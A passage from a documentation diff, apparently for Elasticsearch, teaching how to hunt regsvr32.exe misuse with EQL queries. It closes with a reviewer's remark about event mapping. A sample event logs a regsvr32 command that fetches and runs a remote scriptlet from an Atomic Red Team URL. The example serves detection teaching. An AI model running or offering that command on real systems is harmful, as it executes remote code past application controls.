docs/reference/eql/detect-threats-with-eql.asciidoc

```diff
@@ -0,0 +1,424 @@
+    "total": {
+      "value": 143,
+      "relation": "eq"
+    }
+  }
+}
+----
+// TESTRESPONSE[s/"took": 60/"took": $body.took/]
+
+[discrete]
+[[eql-ex-check-for-command-line-artifacts]]
+=== Check for command line artifacts
+
+Your previous query matched 143 events. Many of these events are likely to be
+false positives.
+
+To narrow down the results, check if the command line was used during any of
+these events. Append `and process.command_line > 0` to the previous EQL query.
+This limits matching results to events that contain a `process.command_line`
+value.
+
+You'll also need to remove the `filter_path=-hits.events` query parameter. This
+lets you retrieve the document source for any matching events.
+
+[source,console]
+----
+GET /my-index-000001/_eql/search
+{
+  "query": """
+    any where process.name == "regsvr32.exe" and process.command_line > 0
+  """,
+  "size": 150
+}
+----
+// TEST[setup:atomic_red_regsvr32]
+
+The query matches one event. Based on the event's `process.command_line` value,
+`regsvr32.exe` was used to register a script as `scrobj.dll`. This fits known
+regsvr32 misuse behavior.
+
+[source,console-result]
+----
+{
+  "is_partial": false,
+  "is_running": false,
+  "took": 21,
+  "timed_out": false,
+  "hits": {
+    "total": {
+      "value": 1,
+      "relation": "eq"
+    },
+    "events": [
+      {
+        "_index": "my-index-000001",
+        "_id": "gl5MJXMBMk1dGnErnBW8",
+        "_score": null,
+        "_source": {
+          "process": {
+            "parent": {
+              "name": "cmd.exe",
+              "entity_id": "{42FC7E13-CBCB-5C05-0000-0010AA385401}",
+              "executable": "C:\\Windows\\System32\\cmd.exe"
+            },
+            "name": "regsvr32.exe",
+            "pid": 2012,
+            "entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
+            "command_line": "regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll",
+            "executable": "C:\\Windows\\System32\\regsvr32.exe",
+            "ppid": 2652
+          },
+          "logon_id": 217055,
+          "@timestamp": 131883573237130000,
+          "event": {
+            "category": "process",
+            "type": "creation"
+          },
+          "user": {
+            "full_name": "bob",
+            "domain": "ART-DESKTOP",
+            "id": "ART-DESKTOP\\bob"
+          }
+        }
+      }
+    ]
+  }
+}
+----
+// TESTRESPONSE[s/"took": 21/"took": $body.took/]
+// TESTRESPONSE[s/"_id": "gl5MJXMBMk1dGnErnBW8"/"_id": $body.hits.events.0._id/]
+
+[discrete]
+[[eql-ex-check-for-malicious-script-loads]]
+=== Check for malicious script loads
+
+You now know that `regsvr32.exe` was used to register
+a potentially malicious script as `scrob.dll`. Next, find any processes that
+later load the `scrob.dll` file.
+
+Modify the previous EQL query as follows:
+
+* Change the `any` keyword to `file`. This means the query only matches
```

Comment:
I'll have to have another look at this dataset. I think that event is mapped as `file` when it should be library. I'll see if I can update it for you, and come back to this example.